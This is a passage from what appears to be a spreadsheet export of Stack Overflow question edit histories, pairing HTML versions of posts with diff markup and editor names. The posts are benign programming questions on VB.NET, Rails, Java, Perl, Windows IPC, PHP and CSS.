End With_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Is there a way to get at the "hidden" instance, so I can view it's properties in the &lt;span class="diff-add"&gt;Immeidate&lt;/span&gt; window? &lt;span class="diff-add"&gt; I&lt;/span&gt; doubt I'll get it in the watch windows, so immediate is fine.&lt;/p&gt; _x000D_
 &lt;p&gt; If you try to access the instance the same way (say, when &lt;span class="diff-add"&gt;.Execute()&lt;/span&gt; throws an exception) from the Immediate window, you get an error:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;? .Style_x000D_
'With' contexts and statements are not valid in debug windows._x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Is there any trick that can be used to get this, or do I have to convert the code to another style? &lt;span class="diff-add"&gt; If&lt;/span&gt; With functioned more like a Using statement, &lt;span class="diff-add"&gt;eg.&lt;/span&gt; "With v = New FancyClass()", this wouldn't pose a problem.&lt;/p&gt; _x000D_
 &lt;p&gt; EDIT: I know how with's work, what alternatives exist, what the compiler does, etc. &lt;span class="diff-add"&gt; I&lt;/span&gt; just want to know if this is possible.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Andrew Backer</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Here's a simplified version of what I'm trying to do :&lt;/p&gt; _x000D_
 &lt;ol&gt; _x000D_
  &lt;li&gt; Before any other actions are performed, present the user with a form to retrieve a string.&lt;/li&gt; _x000D_
  &lt;li&gt; Input the string, and then redirect to the default controller action (e.g. index). The string only needs to exist, no other validations are necessary.&lt;/li&gt; _x000D_
  &lt;li&gt; The string must be available (as an instance variable?) to all the actions in this controller.&lt;/li&gt; _x000D_
 &lt;/ol&gt; _x000D_
 &lt;p&gt; I'm very new with Rails, but this doesn't seem like it ought to be exceedingly hard, so I'm feeling kind of dumb.&lt;/p&gt; _x000D_
 &lt;p&gt; What I've tried : I have a &lt;code&gt;before_filter&lt;/code&gt; redirecting to a private method that looks like&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;def check_string_x000D_
  if @string_x000D_
    return true_x000D_
  else_x000D_
    get_string_x000D_
  end_x000D_
end_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; the &lt;code&gt;get_string&lt;/code&gt; method looks like&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;def get_string_x000D_
  if params[:string]_x000D_
    respond_to do |format|_x000D_
      format.html {redirect_to(accounts_url)} # authenticate.html.erb_x000D_
    end_x000D_
  end_x000D_
        _x000D_
  respond_to do |format|_x000D_
    format.html {render :action =&amp;gt;"get_string"} # get_string.html.erb_x000D_
  end_x000D_
end_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; This fails because i have two render or redirect calls in the same action. I can take out that first &lt;code&gt;respond_to&lt;/code&gt;, of course, but what happens is that the controller gets trapped in the &lt;code&gt;get_string&lt;/code&gt; method. I can more or less see why that's happening, but I don't know how to fix it and break out. I need to be able to show one form (View), get and then do something with the input string, and then proceed as normal.&lt;/p&gt; _x000D_
 &lt;p&gt; The &lt;code&gt;get_string.html.erb&lt;/code&gt; file looks like&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&amp;lt;h1&amp;gt;Enter a string&amp;lt;/h1&amp;gt;_x000D_
&amp;lt;% form_tag('/accounts/get_string') do %&amp;gt;_x000D_
&amp;lt;%= password_field_tag(:string, params[:string])%&amp;gt;_x000D_
&amp;lt;%= submit_tag('Ok')%&amp;gt;_x000D_
&amp;lt;% end %&amp;gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; I'll be thankful for any help!&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Here's a simplified version of what I'm trying to do :&lt;/p&gt; _x000D_
 &lt;ol&gt; _x000D_
  &lt;li&gt; Before any other actions are performed, present the user with a form to retrieve a string.&lt;/li&gt; _x000D_
  &lt;li&gt; Input the string, and then redirect to the default controller action (e.g. index). The string only needs to exist, no other validations are necessary.&lt;/li&gt; _x000D_
  &lt;li&gt; The string must be available (as an instance variable?) to all the actions in this controller.&lt;/li&gt; _x000D_
 &lt;/ol&gt; _x000D_
 &lt;p&gt; I'm very new with Rails, but this doesn't seem like it ought to be exceedingly hard, so I'm feeling kind of dumb.&lt;/p&gt; _x000D_
 &lt;p&gt; What I've tried : I have a &lt;code&gt;before_filter&lt;/code&gt; redirecting to a private method that looks like&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;def check_string_x000D_
  if @string_x000D_
    return true_x000D_
  else_x000D_
    get_string_x000D_
  end_x000D_
end_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; the &lt;code&gt;get_string&lt;/code&gt; method looks like&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;def get_string_x000D_
  if params[:string]_x000D_
    respond_to do |format|_x000D_
      format.html {redirect_to(accounts_url)} # authenticate.html.erb_x000D_
    end_x000D_
  end_x000D_
        _x000D_
  respond_to do |format|_x000D_
    format.html {render :action =&amp;gt;"get_string"} # get_string.html.erb_x000D_
  end_x000D_
end_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; This fails because i have two render or redirect calls in the same action. I can take out that first &lt;code&gt;respond_to&lt;/code&gt;, of course, but what happens is that the controller gets trapped in the &lt;code&gt;get_string&lt;/code&gt; method. I can more or less see why that's happening, but I don't know how to fix it and break out. I need to be able to show one form (View), get and then do something with the input string, and then proceed as normal.&lt;/p&gt; _x000D_
 &lt;p&gt; The &lt;code&gt;get_string.html.erb&lt;/code&gt; file looks like&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&amp;lt;h1&amp;gt;Enter a string&amp;lt;/h1&amp;gt;_x000D_
&amp;lt;% form_tag('/accounts/get_string') do %&amp;gt;_x000D_
&amp;lt;%= password_field_tag(:string, params[:string])%&amp;gt;_x000D_
&amp;lt;%= submit_tag('Ok')%&amp;gt;_x000D_
&amp;lt;% end %&amp;gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; I'll be thankful for any help!&lt;/p&gt; _x000D_
 &lt;h2&gt;&lt;span class="diff-add"&gt;EDIT&lt;/span&gt;&lt;/h2&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Thanks for the replies...&lt;/span&gt;&lt;br&gt;&lt;span class="diff-add"&gt; @Laurie Young : You are right, I was misunderstanding. For some reason I had it in my head that the instance of any given controller invoked by a user would persist throughout their session, and that some of the Rails magic was in tracking objects associated with each user session. I can see why that doesn't make a whole lot of sense in retrospect, and why my attempt to use an instance variable (which I'd thought would persist) won't work. Thanks to you as well :)&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>k.benton</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm planning to create a data structure optimized to hold assembly code. That way I can be totally responsible for the optimization algorithms that will be working on this structure. If I can compile while running. It will be kind of dynamic execution. Is this possible? Have any one seen something like this?&lt;/p&gt; _x000D_
 &lt;p&gt; Should I use structs to link the structure into a program flow. Are objects better?&lt;/p&gt; _x000D_
 &lt;pre class="default s-code-block hljs go"&gt;&lt;code&gt;&lt;span class="hljs-keyword"&gt;struct&lt;/span&gt; asm_code {_x000D_
   &lt;span class="hljs-keyword"&gt;int&lt;/span&gt; &lt;span class="hljs-keyword"&gt;type&lt;/span&gt;;_x000D_
   &lt;span class="hljs-keyword"&gt;int&lt;/span&gt; value;_x000D_
   &lt;span class="hljs-keyword"&gt;int&lt;/span&gt; optimized;_x000D_
   asm_code *next_to_execute;_x000D_
 } asm_imp;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Update: I think it will turn out, like a linked list.&lt;span class="diff-delete"&gt; Update&lt;/span&gt;: I know there are other compilers out there. But this is a military top secret project. So we cant trust any code. We have to do it all by our self.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm planning to create a data structure optimized to hold assembly code. That way I can be totally responsible for the optimization algorithms that will be working on this structure. If I can compile while running. It will be kind of dynamic execution. Is this possible? Have any one seen something like this?&lt;/p&gt; _x000D_
 &lt;p&gt; Should I use structs to link the structure into a program flow. Are objects better?&lt;/p&gt; _x000D_
 &lt;pre class="default s-code-block hljs go"&gt;&lt;code&gt;&lt;span class="hljs-keyword"&gt;struct&lt;/span&gt; asm_code {_x000D_
   &lt;span class="hljs-keyword"&gt;int&lt;/span&gt; &lt;span class="hljs-keyword"&gt;type&lt;/span&gt;;_x000D_
   &lt;span class="hljs-keyword"&gt;int&lt;/span&gt; value;_x000D_
   &lt;span class="hljs-keyword"&gt;int&lt;/span&gt; optimized;_x000D_
   asm_code *next_to_execute;_x000D_
 } asm_imp;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Update: I think it will turn out, like a linked list.&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Update&lt;/span&gt;: I know there are other compilers out there. But this is a military top secret project. So we cant trust any code. We have to do it all by our self.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>FlinkmanSV</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I am relatively new to Java, and often find that I need to sort a &lt;code&gt;Map&amp;lt;Key, Value&amp;gt;&lt;/code&gt; on the values. Since the values are not unique, I find myself converting the &lt;code&gt;keySet&lt;/code&gt; into an &lt;code&gt;array&lt;/code&gt;, and sorting that array through &lt;strong&gt;array sort&lt;/strong&gt; with a &lt;strong&gt;custom comparator&lt;/strong&gt; that sorts on the value associated with the key. Is there an easier way?&lt;span class="diff-delete"&gt;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lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I am relatively new to Java, and often find that I need to sort a &lt;code&gt;Map&amp;lt;Key, Value&amp;gt;&lt;/code&gt; on the values. Since the values are not unique, I find myself converting the &lt;code&gt;keySet&lt;/code&gt; into an &lt;code&gt;array&lt;/code&gt;, and sorting that array through &lt;strong&gt;array sort&lt;/strong&gt; with a &lt;strong&gt;custom comparator&lt;/strong&gt; that sorts on the value associated with the key. Is there an easier way?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; duplicate: &lt;/span&gt;&lt;a href="http://stackoverflow.com/questions/163/how-do-i-sync-the-svn-revision-number-with-my-asp-net-web-site"&gt;&lt;span class="diff-delete"&gt;How do I sync the SVN revision number with my ASP.NET web site?&lt;/span&gt;&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt; How can you automatically import the latest build/revision number in subversion?&lt;/p&gt; _x000D_
 &lt;p&gt; The goal would be to have that number visible on your webpage footer like SO does.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; How can you automatically import the latest build/revision number in subversion?&lt;/p&gt; _x000D_
 &lt;p&gt; The goal would be to have that number visible on your webpage footer like SO does.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>hichris123</t>
  </si>
  <si>
    <t>Wim Coenen</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; this is a repost of a &lt;a href="http://stackoverflow.com/questions/107494/cms-without-front-end"&gt;question not correctly answered&lt;/a&gt; -- sorry about that.&lt;/p&gt; _x000D_
 &lt;p&gt; We are looking for a reasonably priced &lt;a href="http://en.wikipedia.org/wiki/Content_management_system" rel="nofollow noreferrer"&gt;CMS&lt;/a&gt;, with source code, in which we can ditch the portal system. There are notorious examples of something similar which are way too expensive: &lt;a href="http://www.eidosmedia.com/Feature_Update/MethodePortalServer.html" rel="nofollow noreferrer"&gt;Methode&lt;/a&gt;, Broadvision, Microsoft CMS.&lt;/p&gt; _x000D_
 &lt;p&gt; There are a lot of systems in which the portal part is too tightly coupled with the backend to do that. Basically &lt;a href="http://www.joomla.org" rel="nofollow noreferrer"&gt;Joomla&lt;/a&gt;, &lt;a href="http://drupal.org" rel="nofollow noreferrer"&gt;Drupal&lt;/a&gt;, &lt;a href="http://phpnuke.org" rel="nofollow noreferrer"&gt;phpNuke&lt;/a&gt;, &lt;a href="http://www.dotnetnuke.com" rel="nofollow noreferrer"&gt;dotNetNuke&lt;/a&gt;, &lt;a href="http://umbraco.org" rel="nofollow noreferrer"&gt;Umbraco&lt;/a&gt; are all examples of what we don't want.&lt;/p&gt; _x000D_
 &lt;p&gt; We want a back office system that can store heterogeneous information with versioning, workflow and so on. This information should be statically publishable (to files, xml, etc...). Also we would like to have a set of APIs for accessing the information in a custom front-end.&lt;/p&gt; _x000D_
 &lt;p&gt; We would use this system in a large number of websites. Platform is not important as we develop sites on multiple stacks.&lt;/p&gt; _x000D_
 &lt;p&gt; Thank you in advance&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; this is a repost of a &lt;a href="http://stackoverflow.com/questions/107494/cms-without-front-end"&gt;question not correctly answered&lt;/a&gt; -- sorry about that.&lt;/p&gt; _x000D_
 &lt;p&gt; We are looking for a reasonably priced &lt;a href="http://en.wikipedia.org/wiki/Content_management_system" rel="nofollow noreferrer"&gt;CMS&lt;/a&gt;&lt;span class="diff-add"&gt;&amp;nbsp; &lt;/span&gt;, with source code, in which we can ditch the portal system. There are notorious examples of something similar which are way too expensive: &lt;a href="http://www.eidosmedia.com/Feature_Update/MethodePortalServer.html" rel="nofollow noreferrer"&gt;Methode&lt;/a&gt;, Broadvision, Microsoft CMS.&lt;/p&gt; _x000D_
 &lt;p&gt; There are a lot of systems in which the portal part is too tightly coupled with the backend to do that. Basically &lt;a href="http://www.joomla.org" rel="nofollow noreferrer"&gt;Joomla&lt;/a&gt;, &lt;a href="http://drupal.org" rel="nofollow noreferrer"&gt;Drupal&lt;/a&gt;, &lt;a href="http://phpnuke.org" rel="nofollow noreferrer"&gt;phpNuke&lt;/a&gt;, &lt;a href="http://www.dotnetnuke.com" rel="nofollow noreferrer"&gt;dotNetNuke&lt;/a&gt;, &lt;a href="http://umbraco.org" rel="nofollow noreferrer"&gt;Umbraco&lt;/a&gt; are all examples of what we don't want.&lt;/p&gt; _x000D_
 &lt;p&gt; We want a back office system that can store heterogeneous information with versioning, workflow and so on. This information should be statically publishable (to files, xml, etc...). Also we would like to have a set of APIs for accessing the information in a custom front-end.&lt;/p&gt; _x000D_
 &lt;p&gt; We would use this system in a large number of websites. Platform is not important as we develop sites on multiple stacks.&lt;/p&gt; _x000D_
 &lt;p&gt; Thank you in advance&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Sklivvz</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; How would you explain JavaScript closures to someone with a knowledge of the concepts which make up them (for example, functions, variables and the like), but does not understand closures themselves?&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; Can anybody consider that I am 6 and strangely interested in that subject?&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt; I have seen &lt;a href="http://en.wikipedia.org/wiki/Scheme_%28programming_language%29" rel="nofollow noreferrer"&gt;the Scheme example&lt;/a&gt; given on Stack Overflow, and it did not help.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; How would you explain JavaScript closures to someone with a knowledge of the concepts which make up them (for example, functions, variables and the like), but does not understand closures themselves?&lt;/p&gt; _x000D_
 &lt;p&gt; I have seen &lt;a href="http://en.wikipedia.org/wiki/Scheme_%28programming_language%29" rel="nofollow noreferrer"&gt;the Scheme example&lt;/a&gt; given on Stack Overflow, and it did not help.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>meager â™¦</t>
  </si>
  <si>
    <t>Mark Hurd</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; The one-liner should:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; solve a real-world problem&lt;/li&gt; _x000D_
  &lt;li&gt; not be extensively cryptic&lt;span class="diff-delete"&gt;/obfuscated&lt;/span&gt; (should be easy to understand and reproduce)&lt;/li&gt; _x000D_
  &lt;li&gt; be worth the time it takes to write it (should not be too clever)&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; I'm looking for practical tips and tricks (complementary examples for &lt;code&gt;perldoc perlrun&lt;/code&gt;).&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; The one-liner should:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; solve a real-world problem&lt;/li&gt; _x000D_
  &lt;li&gt; not be extensively cryptic (should be easy to understand and reproduce)&lt;/li&gt; _x000D_
  &lt;li&gt; be worth the time it takes to write it (should not be too clever)&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; I'm looking for practical tips and tricks (complementary examples for &lt;code&gt;perldoc perlrun&lt;/code&gt;).&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Gishu</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I am creating an appcation on Vista,which include a service and a Console application .Both running in same user account&lt;/p&gt; _x000D_
 &lt;p&gt; In service i am creating an event and waits for that event.In console application i am opening the same event (problem starts here) and calling &lt;em&gt;SetEvent&lt;/em&gt; function. I can not open the event (getting error 5,Access is denied) in the console application.I searched in the net and saw something about integrity level (I am not sure that the problem is related to integrity level).Its telling that service and applicaation got differnt integrity levels.&lt;/p&gt; _x000D_
 &lt;p&gt; here is the part of the code,where IPC occures&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;service&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;DWORD_x000D_
WINAPI IpcThread(LPVOID lpParam)_x000D_
{_x000D_
HANDLE ghRequestEvent = NULL ;_x000D_
_x000D_
ghRequestEvent = CreateEvent(NULL, FALSE,_x000D_
FALSE, "Global\\Event1") ; //creating the event_x000D_
_x000D_
if(NULL == ghRequestEvent)_x000D_
{_x000D_
//error_x000D_
}_x000D_
while(1)_x000D_
{_x000D_
WaitForSingleObject(ghRequestEvent, INFINITE) //waiting for the event_x000D_
//here some action related to event_x000D_
}_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;Console Application&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; Here in application ,opening the event and seting the event&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;unsigned int_x000D_
event_notification()_x000D_
{_x000D_
HANDLE ghRequestEvent = NULL ;_x000D_
_x000D_
ghRequestEvent = OpenEvent(SYNCHRONIZE|EVENT_MODIFY_STATE, FALSE, "Global\\Event1") ;_x000D_
_x000D_
if(NULL == ghRequestEvent)_x000D_
{_x000D_
//error_x000D_
}_x000D_
SetEvent(ghRequestEvent) ;_x000D_
} _x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; I am running both application (serivce and console application) with administrative privilege (i logged in as Administraor and running the console application by right clicking and using the option "run as administrator") .&lt;/p&gt; _x000D_
 &lt;p&gt; The error i am getting in console application (where i am opening the event) is error no 5(Access is denied. ) .&lt;/p&gt; _x000D_
 &lt;p&gt; So it will be very helpfull if you tell how to do the IPC between a service and an application in Vista&lt;/p&gt; _x000D_
 &lt;p&gt; Thanks in advance&lt;/p&gt; _x000D_
 &lt;p&gt; Navaneeth&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I am creating an appcation on Vista,which include a service and a Console application .Both running in same user account&lt;/p&gt; _x000D_
 &lt;p&gt; In service i am creating an event and waits for that event.In console application i am opening the same event (problem starts here) and calling &lt;em&gt;SetEvent&lt;/em&gt; function. I can not open the event (getting error 5,Access is denied) in the console application.I searched in the net and saw something about integrity level (I am not sure that the problem is related to integrity level).Its telling that service and applicaation got differnt integrity levels.&lt;/p&gt; _x000D_
 &lt;p&gt; here is the part of the code,where IPC occures&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;service&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;DWORD_x000D_
WINAPI IpcThread(LPVOID lpParam)_x000D_
{_x000D_
HANDLE ghRequestEvent = NULL ;_x000D_
_x000D_
ghRequestEvent = CreateEvent(NULL, FALSE,_x000D_
FALSE, "Global\\Event1") ; //creating the event_x000D_
_x000D_
if(NULL == ghRequestEvent)_x000D_
{_x000D_
//error_x000D_
}_x000D_
while(1)_x000D_
{_x000D_
WaitForSingleObject(ghRequestEvent, INFINITE) //waiting for the event_x000D_
//here some action related to event_x000D_
}_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;Console Application&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; Here in application ,opening the event and seting the event&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;unsigned int_x000D_
event_notification()_x000D_
{_x000D_
HANDLE ghRequestEvent = NULL ;&lt;span class="diff-add"&gt;&amp;nbsp;_x000D_
_x000D_
&lt;/span&gt;_x000D_
_x000D_
&lt;span class="diff-add"&gt; &lt;/span&gt;ghRequestEvent = OpenEvent(SYNCHRONIZE|EVENT_MODIFY_STATE, FALSE, "Global\\Event1") ;_x000D_
_x000D_
if(NULL == ghRequestEvent)_x000D_
{_x000D_
//error_x000D_
}_x000D_
SetEvent(ghRequestEvent) ;_x000D_
} _x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; I am running both application (serivce and console application) with administrative privilege (i logged in as Administraor and running the console application by right clicking and using the option "run as administrator") .&lt;/p&gt; _x000D_
 &lt;p&gt; The error i am getting in console application (where i am opening the event) is error no 5(Access is denied. ) .&lt;/p&gt; _x000D_
 &lt;p&gt; So it will be very helpfull if you tell how to do the IPC between a service and an application in Vista&lt;/p&gt; _x000D_
 &lt;p&gt; Thanks in advance&lt;/p&gt; _x000D_
 &lt;p&gt; Navaneeth&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Navaneeth</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm trying to write a function that formats every (&lt;span class="diff-delete"&gt; String &lt;/span&gt;) member/variable in an object, &lt;span class="diff-delete"&gt;For&lt;/span&gt; example with a callback function. The variable names are unknown to me, &lt;span class="diff-delete"&gt;So&lt;/span&gt; it must work with objects of all classes.&lt;/p&gt; _x000D_
 &lt;p&gt; How can I achieve something similar to &lt;code&gt;array_map&lt;/code&gt; or &lt;code&gt;array_walk&lt;/code&gt; with objects&lt;span class="diff-delete"&gt; &amp;nbsp;&lt;/span&gt;?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm trying to write a function that formats every (&lt;span class="diff-add"&gt;string&lt;/span&gt;) member/variable in an object, &lt;span class="diff-add"&gt;for&lt;/span&gt; example with a callback function. The variable names are unknown to me, &lt;span class="diff-add"&gt;so&lt;/span&gt; it must work with objects of all classes.&lt;/p&gt; _x000D_
 &lt;p&gt; How can I achieve something similar to &lt;code&gt;array_map&lt;/code&gt; or &lt;code&gt;array_walk&lt;/code&gt; with objects?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Christian Davén</t>
  </si>
  <si>
    <t>Syed mohamed aladeen</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; How can I horizontally center a &lt;code&gt;&lt;span class="diff-delete"&gt;&amp;lt;div&amp;gt;&lt;/span&gt;&lt;/code&gt; within &lt;span class="diff-delete"&gt;another&lt;/span&gt; &lt;code&gt;&lt;span class="diff-delete"&gt;&amp;lt;div&amp;gt;&lt;/span&gt;&lt;/code&gt; using &lt;strong&gt;&lt;span class="diff-delete"&gt;CSS&lt;/span&gt;&lt;/strong&gt; (if it's even possible)&lt;span class="diff-delete"&gt;, when the&lt;/span&gt; outer &lt;code&gt;&lt;span class="diff-delete"&gt;&amp;lt;div&amp;gt;&lt;/span&gt;&lt;/code&gt; has &lt;code&gt;width:&lt;span class="diff-delete"&gt; &lt;/span&gt;100%&lt;/code&gt;&lt;span class="diff-delete"&gt;?&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; For example&lt;/span&gt;:&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;/p&gt; _x000D_
 &lt;div class="snippet" data-lang="js" data-hide="false" data-console="false" data-babel="false"&gt; _x000D_
  &lt;div class="snippet-code"&gt; _x000D_
   &lt;pre class="snippet-code-html lang-html s-code-block hljs xml"&gt;&lt;code&gt;&lt;span class="hljs-tag"&gt;&amp;lt;&lt;span class="hljs-name"&gt;div&lt;/span&gt; &lt;span class="hljs-attr"&gt;id&lt;/span&gt;=&lt;span class="hljs-string"&gt;"outer"&lt;/span&gt; &lt;span class="hljs-attr"&gt;style&lt;/span&gt;=&lt;span class="hljs-string"&gt;"width:&lt;/span&gt;&lt;/span&gt;&lt;span class="diff-delete"&gt;&lt;span class="hljs-tag"&gt;&lt;span class="hljs-string"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="hljs-tag"&gt;&lt;span class="hljs-string"&gt;100%"&lt;/span&gt;&amp;gt;&lt;/span&gt;  _x000D_
  &lt;span class="hljs-tag"&gt;&amp;lt;&lt;span class="hljs-name"&gt;div&lt;/span&gt; &lt;span class="hljs-attr"&gt;id&lt;/span&gt;=&lt;span class="hljs-string"&gt;"inner"&lt;/span&gt;&amp;gt;&lt;/span&gt;Foo foo&lt;span class="hljs-tag"&gt;&amp;lt;/&lt;span class="hljs-name"&gt;div&lt;/span&gt;&amp;gt;&lt;/span&gt;_x000D_
&lt;span class="hljs-tag"&gt;&amp;lt;/&lt;span class="hljs-name"&gt;div&lt;/span&gt;&amp;gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
   &lt;div class="snippet-result"&gt; _x000D_
    &lt;div class="snippet-ctas"&gt; _x000D_
     &lt;button type="button" class="s-btn s-btn__primary"&gt;&lt;span class="icon-play-white _hover"&gt;&lt;/span&gt;&lt;span&gt; Run code snippet&lt;/span&gt;&lt;/button&gt; _x000D_
     &lt;input class="copySnippet s-btn s-btn__filled" type="button" value="Copy snippet to answer" style="display: none;"&gt; _x000D_
     &lt;button type="button" class="s-btn hideResults" style="display: none;"&gt;Hide results&lt;/button&gt; _x000D_
     &lt;div class="popout-code"&gt; _x000D_
      &lt;a class="snippet-expand-link"&gt;Expand snippet&lt;/a&gt; _x000D_
     &lt;/div&gt; _x000D_
    &lt;/div&gt; _x000D_
    &lt;div class="snippet-result-code" style="display: none;"&gt; _x000D_
     &lt;iframe name="sif2" sandbox="allow-forms allow-modals allow-scripts" class="snippet-box-edit snippet-box-result" frameborder="0"&gt;&lt;/iframe&gt; _x000D_
    &lt;/div&gt; _x000D_
   &lt;/div&gt; _x000D_
  &lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
 &lt;p&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; How can I horizontally center a &lt;code&gt;&lt;span class="diff-add"&gt;div&lt;/span&gt;&lt;/code&gt; within &lt;span class="diff-add"&gt;a&lt;/span&gt; &lt;code&gt;&lt;span class="diff-add"&gt;div&lt;/span&gt;&lt;/code&gt; using &lt;span class="diff-add"&gt;CSS&lt;/span&gt; (if it's even possible)&lt;span class="diff-add"&gt;?&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
